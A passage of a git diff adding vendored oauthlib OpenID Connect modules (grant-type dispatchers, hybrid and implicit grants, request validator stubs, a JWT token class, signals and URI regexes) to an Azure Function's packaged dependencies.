The popup User Agent window should be of an + appropriate size for a login-focused dialog and should not + obscure the entire window that it is popping up over. + + touch - The Authorization Server SHOULD display the + authentication and consent UI consistent with a device that + leverages a touch interface. + + wap - The Authorization Server SHOULD display the + authentication and consent UI consistent with a "feature + phone" type display. + + The Authorization Server MAY also attempt to detect the + capabilities of the User Agent and present an appropriate + display. + + prompt + OPTIONAL. Space delimited, case sensitive list of ASCII string + values that specifies whether the Authorization Server prompts + the End-User for reauthentication and consent. The defined + values are: + + none - The Authorization Server MUST NOT display any + authentication or consent user interface pages. An error is + returned if an End-User is not already authenticated or the + Client does not have pre-configured consent for the + requested Claims or does not fulfill other conditions for + processing the request. The error code will typically be + login_required, interaction_required, or another code + defined in Section 3.1.2.6. This can be used as a method to + check for existing authentication and/or consent. + + login - The Authorization Server SHOULD prompt the End-User + for reauthentication. If it cannot reauthenticate the + End-User, it MUST return an error, typically + login_required. + + consent - The Authorization Server SHOULD prompt the + End-User for consent before returning information to the + Client. If it cannot obtain consent, it MUST return an + error, typically consent_required. + + select_account - The Authorization Server SHOULD prompt the + End-User to select a user account. This enables an End-User + who has multiple accounts at the Authorization Server to + select amongst the multiple accounts that they might have + current sessions for. If it cannot obtain an account + selection choice made by the End-User, it MUST return an + error, typically account_selection_required. + + The prompt parameter can be used by the Client to make sure + that the End-User is still present for the current session or + to bring attention to the request. If this parameter contains + none with any other value, an error is returned. + + max_age + OPTIONAL. Maximum Authentication Age. Specifies the allowable + elapsed time in seconds since the last time the End-User was + actively authenticated by the OP. If the elapsed time is + greater than this value, the OP MUST attempt to actively + re-authenticate the End-User. (The max_age request parameter + corresponds to the OpenID 2.0 PAPE [OpenID.PAPE] max_auth_age + request parameter.) When max_age is used, the ID Token returned + MUST include an auth_time Claim Value. + + ui_locales + OPTIONAL. End-User's preferred languages and scripts for the + user interface, represented as a space-separated list of BCP47 + [RFC5646] language tag values, ordered by preference. For + instance, the value "fr-CA fr en" represents a preference for + French as spoken in Canada, then French (without a region + designation), followed by English (without a region + designation). An error SHOULD NOT result if some or all of the + requested locales are not supported by the OpenID Provider. + + id_token_hint + OPTIONAL. ID Token previously issued by the Authorization + Server being passed as a hint about the End-User's current or + past authenticated session with the Client. 
If the End-User + identified by the ID Token is logged in or is logged in by the + request, then the Authorization Server returns a positive + response; otherwise, it SHOULD return an error, such as + login_required. When possible, an id_token_hint SHOULD be + present when prompt=none is used and an invalid_request error + MAY be returned if it is not; however, the server SHOULD + respond successfully when possible, even if it is not present. + The Authorization Server need not be listed as an audience of + the ID Token when it is used as an id_token_hint value. If the + ID Token received by the RP from the OP is encrypted, to use it + as an id_token_hint, the Client MUST decrypt the signed ID + Token contained within the encrypted ID Token. The Client MAY + re-encrypt the signed ID token to the Authentication Server + using a key that enables the server to decrypt the ID Token, + and use the re-encrypted ID token as the id_token_hint value. + + login_hint + OPTIONAL. Hint to the Authorization Server about the login + identifier the End-User might use to log in (if necessary). + This hint can be used by an RP if it first asks the End-User + for their e-mail address (or other identifier) and then wants + to pass that value as a hint to the discovered authorization + service. It is RECOMMENDED that the hint value match the value + used for discovery. This value MAY also be a phone number in + the format specified for the phone_number Claim. The use of + this parameter is left to the OP's discretion. + + acr_values + OPTIONAL. Requested Authentication Context Class Reference + values. Space-separated string that specifies the acr values + that the Authorization Server is being requested to use for + processing this Authentication Request, with the values + appearing in order of preference. The Authentication Context + Class satisfied by the authentication performed is returned as + the acr Claim Value, as specified in Section 2. The acr Claim + is requested as a Voluntary Claim by this parameter. + """ + + # Treat it as normal OAuth 2 auth code request if openid is not present + if not request.scopes or 'openid' not in request.scopes: + return {} + + prompt = request.prompt if request.prompt else [] + if hasattr(prompt, 'split'): + prompt = prompt.strip().split() + prompt = set(prompt) + + if 'none' in prompt: + + if len(prompt) > 1: + msg = "Prompt none is mutually exclusive with other values." + raise InvalidRequestError(request=request, description=msg) + + if not self.request_validator.validate_silent_login(request): + raise LoginRequired(request=request) + + if not self.request_validator.validate_silent_authorization(request): + raise ConsentRequired(request=request) + + self._inflate_claims(request) + + if not self.request_validator.validate_user_match( + request.id_token_hint, request.scopes, request.claims, request): + msg = "Session user does not match client supplied user." 
+            raise LoginRequired(request=request, description=msg)
+
+        request_info = {
+            'display': request.display,
+            'nonce': request.nonce,
+            'prompt': prompt,
+            'ui_locales': request.ui_locales.split() if request.ui_locales else [],
+            'id_token_hint': request.id_token_hint,
+            'login_hint': request.login_hint,
+            'claims': request.claims
+        }
+
+        return request_info
+
+
+OpenIDConnectBase = GrantTypeBase
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/dispatchers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/dispatchers.py
new file mode 100644
index 0000000..7859eaa
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/dispatchers.py
@@ -0,0 +1,101 @@
+import logging
+
+log = logging.getLogger(__name__)
+
+
+class Dispatcher:
+    default_grant = None
+    oidc_grant = None
+
+
+class AuthorizationCodeGrantDispatcher(Dispatcher):
+    """
+    This is an adapter class that will route simple Authorization Code
+    requests, those that have `response_type=code` and a scope including
+    `openid`, to either the `default_grant` or the `oidc_grant` based on
+    the scopes requested.
+    """
+    def __init__(self, default_grant=None, oidc_grant=None):
+        self.default_grant = default_grant
+        self.oidc_grant = oidc_grant
+
+    def _handler_for_request(self, request):
+        handler = self.default_grant
+
+        if request.scopes and "openid" in request.scopes:
+            handler = self.oidc_grant
+
+        log.debug('Selecting handler for request %r.', handler)
+        return handler
+
+    def create_authorization_response(self, request, token_handler):
+        """Read scope and route to the designated handler."""
+        return self._handler_for_request(request).create_authorization_response(request, token_handler)
+
+    def validate_authorization_request(self, request):
+        """Read scope and route to the designated handler."""
+        return self._handler_for_request(request).validate_authorization_request(request)
+
+
+class ImplicitTokenGrantDispatcher(Dispatcher):
+    """
+    This is an adapter class that will route simple Authorization
+    requests, those that have `id_token` in `response_type` and a scope
+    including `openid`, to either the `default_grant` or the `oidc_grant`
+    based on the scopes requested.
+    """
+    def __init__(self, default_grant=None, oidc_grant=None):
+        self.default_grant = default_grant
+        self.oidc_grant = oidc_grant
+
+    def _handler_for_request(self, request):
+        handler = self.default_grant
+
+        if request.scopes and "openid" in request.scopes and 'id_token' in request.response_type:
+            handler = self.oidc_grant
+
+        log.debug('Selecting handler for request %r.', handler)
+        return handler
+
+    def create_authorization_response(self, request, token_handler):
+        """Read scope and route to the designated handler."""
+        return self._handler_for_request(request).create_authorization_response(request, token_handler)
+
+    def validate_authorization_request(self, request):
+        """Read scope and route to the designated handler."""
+        return self._handler_for_request(request).validate_authorization_request(request)
+
+
+class AuthorizationTokenGrantDispatcher(Dispatcher):
+    """
+    This is an adapter class that will route simple Token requests to either
+    the default_grant or the oidc_grant, based on whether the authorization
+    code being exchanged was issued with a scope including 'openid'.
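+
+    For example (illustrative only; the grant and validator names are
+    hypothetical): a token request exchanging a code stored with scopes
+    ('openid', 'profile') is routed to `oidc_grant`, while a code stored
+    with ('profile',) alone is handled by `default_grant`:
+
+        dispatcher = AuthorizationTokenGrantDispatcher(
+            request_validator=my_validator,  # implements get_authorization_code_scopes
+            default_grant=plain_auth_code_grant,
+            oidc_grant=openid_auth_code_grant,
+        )
+        headers, body, status = dispatcher.create_token_response(request, bearer_token)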
+    """
+    def __init__(self, request_validator, default_grant=None, oidc_grant=None):
+        self.default_grant = default_grant
+        self.oidc_grant = oidc_grant
+        self.request_validator = request_validator
+
+    def _handler_for_request(self, request):
+        handler = self.default_grant
+        scopes = ()
+        parameters = dict(request.decoded_body)
+        client_id = parameters.get('client_id', None)
+        code = parameters.get('code', None)
+        redirect_uri = parameters.get('redirect_uri', None)
+
+        # If code is not present, fall back to `default_grant`, which will
+        # raise an error for the missing `code` in the `create_token_response` step.
+        if code:
+            scopes = self.request_validator.get_authorization_code_scopes(client_id, code, redirect_uri, request)
+
+        if 'openid' in scopes:
+            handler = self.oidc_grant
+
+        log.debug('Selecting handler for request %r.', handler)
+        return handler
+
+    def create_token_response(self, request, token_handler):
+        """Read scope and route to the designated handler."""
+        handler = self._handler_for_request(request)
+        return handler.create_token_response(request, token_handler)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/hybrid.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/hybrid.py
new file mode 100644
index 0000000..e72f38e
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/hybrid.py
@@ -0,0 +1,63 @@
+"""
+oauthlib.openid.connect.core.grant_types
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+"""
+import logging
+
+from oauthlib.oauth2.rfc6749.errors import InvalidRequestError
+from oauthlib.oauth2.rfc6749.grant_types.authorization_code import (
+    AuthorizationCodeGrant as OAuth2AuthorizationCodeGrant,
+)
+
+from ..request_validator import RequestValidator
+from .base import GrantTypeBase
+
+log = logging.getLogger(__name__)
+
+
+class HybridGrant(GrantTypeBase):
+
+    def __init__(self, request_validator=None, **kwargs):
+        self.request_validator = request_validator or RequestValidator()
+
+        self.proxy_target = OAuth2AuthorizationCodeGrant(
+            request_validator=request_validator, **kwargs)
+        # All hybrid response types should be fragment-encoded.
+        self.proxy_target.default_response_mode = "fragment"
+        self.register_response_type('code id_token')
+        self.register_response_type('code token')
+        self.register_response_type('code id_token token')
+        self.custom_validators.post_auth.append(
+            self.openid_authorization_validator)
+        # Hybrid flows can return the id_token from the authorization
+        # endpoint as part of the 'code' response.
+        self.register_code_modifier(self.add_token)
+        self.register_code_modifier(self.add_id_token)
+        self.register_token_modifier(self.add_id_token)
+
+    def add_id_token(self, token, token_handler, request):
+        return super().add_id_token(token, token_handler, request, nonce=request.nonce)
+
+    def openid_authorization_validator(self, request):
+        """Additional validation when following the Authorization Code flow.
+        """
+        request_info = super().openid_authorization_validator(request)
+        if not request_info:  # returns immediately if OAuth 2.0
+            return request_info
+
+        # nonce is REQUIRED if the Response Type of the request is `code
+        # id_token` or `code id_token token` and OPTIONAL when the
+        # Response Type of the request is `code token`.
It is a string + # value used to associate a Client session with an ID Token, + # and to mitigate replay attacks. The value is passed through + # unmodified from the Authentication Request to the ID + # Token. Sufficient entropy MUST be present in the `nonce` + # values used to prevent attackers from guessing values. For + # implementation notes, see Section 15.5.2. + if request.response_type in ["code id_token", "code id_token token"]: + if not request.nonce: + raise InvalidRequestError( + request=request, + description='Request is missing mandatory nonce parameter.' + ) + return request_info diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/implicit.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/implicit.py new file mode 100644 index 0000000..8f4c31a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/implicit.py @@ -0,0 +1,51 @@ +""" +oauthlib.openid.connect.core.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib.oauth2.rfc6749.errors import InvalidRequestError +from oauthlib.oauth2.rfc6749.grant_types.implicit import ( + ImplicitGrant as OAuth2ImplicitGrant, +) + +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class ImplicitGrant(GrantTypeBase): + + def __init__(self, request_validator=None, **kwargs): + self.proxy_target = OAuth2ImplicitGrant( + request_validator=request_validator, **kwargs) + self.register_response_type('id_token') + self.register_response_type('id_token token') + self.custom_validators.post_auth.append( + self.openid_authorization_validator) + self.register_token_modifier(self.add_id_token) + + def add_id_token(self, token, token_handler, request): + if 'state' not in token and request.state: + token['state'] = request.state + return super().add_id_token(token, token_handler, request, nonce=request.nonce) + + def openid_authorization_validator(self, request): + """Additional validation when following the implicit flow. + """ + request_info = super().openid_authorization_validator(request) + if not request_info: # returns immediately if OAuth2.0 + return request_info + + # REQUIRED. String value used to associate a Client session with an ID + # Token, and to mitigate replay attacks. The value is passed through + # unmodified from the Authentication Request to the ID Token. + # Sufficient entropy MUST be present in the nonce values used to + # prevent attackers from guessing values. For implementation notes, see + # Section 15.5.2. + if not request.nonce: + raise InvalidRequestError( + request=request, + description='Request is missing mandatory nonce parameter.' 
+            )
+        return request_info
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/refresh_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/refresh_token.py
new file mode 100644
index 0000000..3dd684a
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/refresh_token.py
@@ -0,0 +1,34 @@
+"""
+oauthlib.openid.connect.core.grant_types
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+"""
+import logging
+
+from oauthlib.oauth2.rfc6749.grant_types.refresh_token import (
+    RefreshTokenGrant as OAuth2RefreshTokenGrant,
+)
+
+from .base import GrantTypeBase
+
+log = logging.getLogger(__name__)
+
+
+class RefreshTokenGrant(GrantTypeBase):
+
+    def __init__(self, request_validator=None, **kwargs):
+        self.proxy_target = OAuth2RefreshTokenGrant(
+            request_validator=request_validator, **kwargs)
+        self.register_token_modifier(self.add_id_token)
+
+    def add_id_token(self, token, token_handler, request):
+        """
+        Construct an initial version of id_token, and let the
+        request_validator sign or encrypt it.
+
+        The authorization_code version of this method is used to
+        retrieve the nonce from the code storage.
+        """
+        if not self.request_validator.refresh_id_token(request):
+            return token
+
+        return super().add_id_token(token, token_handler, request)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/request_validator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/request_validator.py
new file mode 100644
index 0000000..4fe2e14
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/request_validator.py
@@ -0,0 +1,320 @@
+"""
+oauthlib.openid.connect.core.request_validator
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+"""
+import logging
+
+from oauthlib.oauth2.rfc6749.request_validator import (
+    RequestValidator as OAuth2RequestValidator,
+)
+
+log = logging.getLogger(__name__)
+
+
+class RequestValidator(OAuth2RequestValidator):
+
+    def get_authorization_code_scopes(self, client_id, code, redirect_uri, request):
+        """ Extracts scopes from the saved authorization code.
+
+        The scopes returned by this method are used to route token requests
+        based on the scopes passed to Authorization Code requests.
+
+        With that, the token endpoint knows whether to include an OpenID
+        Connect id_token in the token response, based solely on the
+        authorization code's scopes.
+
+        The code param alone should be sufficient to retrieve the grant
+        from any storage you are using. However, `client_id` and
+        `redirect_uri` can have a blank value `""`, so don't forget to
+        check them before using those values in a select query if a
+        database is used.
+
+        :param client_id: Unicode client identifier
+        :param code: Unicode authorization code grant
+        :param redirect_uri: Unicode absolute URI
+        :return: A list of scopes
+
+        Method is used by:
+            - Authorization Token Grant Dispatcher
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def get_authorization_code_nonce(self, client_id, code, redirect_uri, request):
+        """ Extracts nonce from the saved authorization code.
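+
+        A minimal illustrative sketch (the storage layer shown here is
+        hypothetical, not part of oauthlib):
+
+            def get_authorization_code_nonce(self, client_id, code, redirect_uri, request):
+                grant = self.storage.find_code(code)  # hypothetical lookup
+                return grant.nonce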
+ + If present in the Authentication Request, Authorization + Servers MUST include a nonce Claim in the ID Token with the + Claim Value being the nonce value sent in the Authentication + Request. Authorization Servers SHOULD perform no other + processing on nonce values used. The nonce value is a + case-sensitive string. + + Only code param should be sufficient to retrieve grant code from + any storage you are using. However, `client_id` and `redirect_uri` + have been validated and can be used also. + + :param client_id: Unicode client identifier + :param code: Unicode authorization code grant + :param redirect_uri: Unicode absolute URI + :return: Unicode nonce + + Method is used by: + - Authorization Token Grant Dispatcher + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_jwt_bearer_token(self, token, token_handler, request): + """Get JWT Bearer token or OpenID Connect ID token + + If using OpenID Connect this SHOULD call `oauthlib.oauth2.RequestValidator.get_id_token` + + :param token: A Bearer token dict + :param token_handler: the token handler (BearerToken class) + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :return: The JWT Bearer token or OpenID Connect ID token (a JWS signed JWT) + + Method is used by JWT Bearer and OpenID Connect tokens: + - JWTToken.create_token + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_id_token(self, token, token_handler, request): + """Get OpenID Connect ID token + + This method is OPTIONAL and is NOT RECOMMENDED. + `finalize_id_token` SHOULD be implemented instead. However, if you + want a full control over the minting of the `id_token`, you + MAY want to override `get_id_token` instead of using + `finalize_id_token`. + + In the OpenID Connect workflows when an ID Token is requested this method is called. + Subclasses should implement the construction, signing and optional encryption of the + ID Token as described in the OpenID Connect spec. + + In addition to the standard OAuth2 request properties, the request may also contain + these OIDC specific properties which are useful to this method: + + - nonce, if workflow is implicit or hybrid and it was provided + - claims, if provided to the original Authorization Code request + + The token parameter is a dict which may contain an ``access_token`` entry, in which + case the resulting ID Token *should* include a calculated ``at_hash`` claim. + + Similarly, when the request parameter has a ``code`` property defined, the ID Token + *should* include a calculated ``c_hash`` claim. + + http://openid.net/specs/openid-connect-core-1_0.html (sections `3.1.3.6`_, `3.2.2.10`_, `3.3.2.11`_) + + .. _`3.1.3.6`: http://openid.net/specs/openid-connect-core-1_0.html#CodeIDToken + .. _`3.2.2.10`: http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDToken + .. _`3.3.2.11`: http://openid.net/specs/openid-connect-core-1_0.html#HybridIDToken + + :param token: A Bearer token dict + :param token_handler: the token handler (BearerToken class) + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :return: The ID Token (a JWS signed JWT) + """ + return None + + def finalize_id_token(self, id_token, token, token_handler, request): + """Finalize OpenID Connect ID token & Sign or Encrypt. + + In the OpenID Connect workflows when an ID Token is requested + this method is called. 
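+
+        A hedged override sketch (the `jwt_sign` helper and `private_key`
+        attribute are hypothetical; the `iss` and `exp` values are
+        illustrative):
+
+            def finalize_id_token(self, id_token, token, token_handler, request):
+                id_token['iss'] = 'https://issuer.example.com'
+                id_token['sub'] = request.user.id
+                id_token['exp'] = id_token['iat'] + 3600
+                return jwt_sign(id_token, key=self.private_key)  # hypothetical
+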
+        Subclasses should implement the construction, signing and
+        optional encryption of the ID Token as described in the OpenID
+        Connect spec.
+
+        The `id_token` parameter is a dict containing a couple of OIDC
+        technical fields related to the specification. Prepopulated
+        attributes are:
+
+        - `aud`, equal to `request.client_id`.
+        - `iat`, equal to the current time.
+        - `nonce`, if present, equal to the `nonce` from the
+          authorization request.
+        - `at_hash`, hash of `access_token`, if relevant.
+        - `c_hash`, hash of `code`, if relevant.
+
+        This method MUST provide the required fields below:
+
+        - `iss`, REQUIRED. Issuer Identifier for the Issuer of the response.
+        - `sub`, REQUIRED. Subject Identifier.
+        - `exp`, REQUIRED. Expiration time on or after which the ID
+          Token MUST NOT be accepted by the RP when performing
+          authentication with the OP.
+
+        Additional claims must be added; note that `request.scope`
+        should be used to determine the list of claims.
+
+        More information can be found at `OpenID Connect Core#Claims`_
+
+        .. _`OpenID Connect Core#Claims`: https://openid.net/specs/openid-connect-core-1_0.html#Claims
+
+        :param id_token: A dict containing technical fields of id_token
+        :param token: A Bearer token dict
+        :param token_handler: the token handler (BearerToken class)
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :return: The ID Token (a JWS signed JWT or JWE encrypted JWT)
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_jwt_bearer_token(self, token, scopes, request):
+        """Ensure the JWT Bearer token or OpenID Connect ID token is valid
+        and authorized access to scopes.
+
+        If using OpenID Connect this SHOULD call `oauthlib.oauth2.RequestValidator.get_id_token`
+
+        If not using OpenID Connect this can `return None` to yield a
+        401/403 response rather than a 5xx one.
+
+        OpenID Connect Core 1.0 describes how to validate an id_token:
+        - http://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation
+        - http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDTValidation
+        - http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation
+        - http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation2
+
+        :param token: Unicode Bearer token
+        :param scopes: List of scopes (defined by you)
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is indirectly used by all core OpenID Connect JWT token issuing grant types:
+        - Authorization Code Grant
+        - Implicit Grant
+        - Hybrid Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_id_token(self, token, scopes, request):
+        """Ensure the id token is valid and authorized access to scopes.
+
+        OpenID Connect Core 1.0 describes how to validate an id_token:
+        - http://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation
+        - http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDTValidation
+        - http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation
+        - http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation2
+
+        :param token: Unicode Bearer token
+        :param scopes: List of scopes (defined by you)
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is indirectly used by all core OpenID Connect JWT token issuing grant types:
+        - Authorization Code Grant
+        - Implicit Grant
+        - Hybrid Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_silent_authorization(self, request):
+        """Ensure the logged in user has authorized silent OpenID authorization.
+
+        Silent OpenID authorization allows access tokens and id tokens to be
+        granted to clients without any user prompt or interaction.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - OpenIDConnectAuthCode
+            - OpenIDConnectImplicit
+            - OpenIDConnectHybrid
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_silent_login(self, request):
+        """Ensure the session user has authorized silent OpenID login.
+
+        If no user is logged in, or the user has not authorized silent
+        login, this method should return False.
+
+        If the user is logged in but is associated with multiple accounts
+        and has not selected which one to link to the token, then this
+        method should raise an oauthlib.oauth2.AccountSelectionRequired
+        error.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - OpenIDConnectAuthCode
+            - OpenIDConnectImplicit
+            - OpenIDConnectHybrid
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_user_match(self, id_token_hint, scopes, claims, request):
+        """Ensure the client-supplied user id hint matches the session user.
+
+        If the sub claim or id_token_hint is supplied, then the session
+        user must match the given ID.
+
+        :param id_token_hint: User identifier string.
+        :param scopes: List of OAuth 2 scopes and OpenID claims (strings).
+        :param claims: OpenID Connect claims dict.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - OpenIDConnectAuthCode
+            - OpenIDConnectImplicit
+            - OpenIDConnectHybrid
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def get_userinfo_claims(self, request):
+        """Return the UserInfo claims as JSON, or in signed or encrypted form.
+
+        The UserInfo Claims MUST be returned as the members of a JSON object
+        unless a signed or encrypted response was requested during Client
+        Registration. The Claims defined in Section 5.1 can be returned, as can
+        additional Claims not specified there.
+
+        For privacy reasons, OpenID Providers MAY elect to not return values for
+        some requested Claims.
+
+        If a Claim is not returned, that Claim Name SHOULD be omitted from the
+        JSON object representing the Claims; it SHOULD NOT be present with a
+        null or empty string value.
+
+        The sub (subject) Claim MUST always be returned in the UserInfo
+        Response.
+
+        Upon receipt of the UserInfo Request, the UserInfo Endpoint MUST return
+        the JSON Serialization of the UserInfo Response as in Section 13.3 in
+        the HTTP response body unless a different format was specified during
+        Registration [OpenID.Registration].
+
+        If the UserInfo Response is signed and/or encrypted, then the Claims are
+        returned in a JWT and the content-type MUST be application/jwt. The
+        response MAY be encrypted without also being signed. If both signing and
+        encryption are requested, the response MUST be signed then encrypted,
+        with the result being a Nested JWT, as defined in [JWT].
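+
+        A plain (unsigned) return value might look like this minimal,
+        illustrative dict (all values are hypothetical):
+
+            {
+                'sub': '248289761001',
+                'name': 'Jane Doe',
+                'email': 'janedoe@example.com',
+            }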
+
+        If signed, the UserInfo Response SHOULD contain the Claims iss
+        (issuer) and aud (audience) as members. The iss value SHOULD be
+        the OP's Issuer Identifier URL. The aud value SHOULD be or
+        include the RP's Client ID value.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: Claims as a dict OR JWT/JWS/JWE as a string
+
+        Method is used by:
+            UserInfoEndpoint
+        """
+
+    def refresh_id_token(self, request):
+        """Whether the id token should be refreshed. Defaults to True.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            RefreshTokenGrant
+        """
+        return True
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/tokens.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/tokens.py
new file mode 100644
index 0000000..7dcdf37
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/tokens.py
@@ -0,0 +1,46 @@
+"""
+oauthlib.openid.connect.core.tokens
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This module contains methods for adding JWT tokens to requests.
+"""
+from oauthlib.oauth2.rfc6749.tokens import TokenBase, random_token_generator, get_token_from_header
+
+
+class JWTToken(TokenBase):
+    __slots__ = (
+        'request_validator', 'token_generator',
+        'refresh_token_generator', 'expires_in'
+    )
+
+    def __init__(self, request_validator=None, token_generator=None,
+                 expires_in=None, refresh_token_generator=None):
+        self.request_validator = request_validator
+        self.token_generator = token_generator or random_token_generator
+        self.refresh_token_generator = (
+            refresh_token_generator or self.token_generator
+        )
+        self.expires_in = expires_in or 3600
+
+    def create_token(self, request, refresh_token=False):
+        """Create a JWT Token, using the request_validator method."""
+
+        if callable(self.expires_in):
+            expires_in = self.expires_in(request)
+        else:
+            expires_in = self.expires_in
+
+        request.expires_in = expires_in
+
+        return self.request_validator.get_jwt_bearer_token(None, None, request)
+
+    def validate_request(self, request):
+        token = get_token_from_header(request)
+        return self.request_validator.validate_jwt_bearer_token(
+            token, request.scopes, request)
+
+    def estimate_type(self, request):
+        token = get_token_from_header(request)
+        if token and token.startswith('ey') and token.count('.') in (2, 4):
+            return 10
+        return 0
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/signals.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/signals.py
new file mode 100644
index 0000000..5f62534
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/signals.py
@@ -0,0 +1,40 @@
+"""
+    Implements signals based on blinker if available, otherwise
+    falls silently back to a noop.
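+
+    A hedged usage sketch (receiving only works when blinker is
+    installed; the receiver function here is hypothetical):
+
+        from oauthlib.signals import scope_changed
+
+        def on_scope_changed(sender, old=None, new=None):
+            print('scope changed:', old, '->', new)
+
+        scope_changed.connect(on_scope_changed)
+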
Shamelessly stolen from flask.signals: + https://github.com/mitsuhiko/flask/blob/master/flask/signals.py +""" +signals_available = False +try: + from blinker import Namespace + signals_available = True +except ImportError: # noqa + class Namespace: + def signal(self, name, doc=None): + return _FakeSignal(name, doc) + + class _FakeSignal: + """If blinker is unavailable, create a fake class with the same + interface that allows sending of signals but will fail with an + error on anything else. Instead of doing anything on send, it + will just ignore the arguments and do nothing instead. + """ + + def __init__(self, name, doc=None): + self.name = name + self.__doc__ = doc + def _fail(self, *args, **kwargs): + raise RuntimeError('signalling support is unavailable ' + 'because the blinker library is ' + 'not installed.') + send = lambda *a, **kw: None + connect = disconnect = has_receivers_for = receivers_for = \ + temporarily_connected_to = connected_to = _fail + del _fail + +# The namespace for code signals. If you are not oauthlib code, do +# not put signals in here. Create your own namespace instead. +_signals = Namespace() + + +# Core signals. +scope_changed = _signals.signal('scope-changed') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/uri_validate.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/uri_validate.py new file mode 100644 index 0000000..ae461ad --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/uri_validate.py @@ -0,0 +1,190 @@ +""" +Regex for URIs + +These regex are directly derived from the collected ABNF in RFC3986 +(except for DIGIT, ALPHA and HEXDIG, defined by RFC2234). + +They should be processed with re.VERBOSE. + +Thanks Mark Nottingham for this code - https://gist.github.com/138549 +""" +import re + +# basics + +DIGIT = r"[\x30-\x39]" + +ALPHA = r"[\x41-\x5A\x61-\x7A]" + +HEXDIG = r"[\x30-\x39A-Fa-f]" + +# pct-encoded = "%" HEXDIG HEXDIG +pct_encoded = r" %% %(HEXDIG)s %(HEXDIG)s" % locals() + +# unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~" +unreserved = r"(?: %(ALPHA)s | %(DIGIT)s | \- | \. | _ | ~ )" % locals() + +# gen-delims = ":" / "/" / "?" / "#" / "[" / "]" / "@" +gen_delims = r"(?: : | / | \? | \# | \[ | \] | @ )" + +# sub-delims = "!" / "$" / "&" / "'" / "(" / ")" +# / "*" / "+" / "," / ";" / "=" +sub_delims = r"""(?: ! | \$ | & | ' | \( | 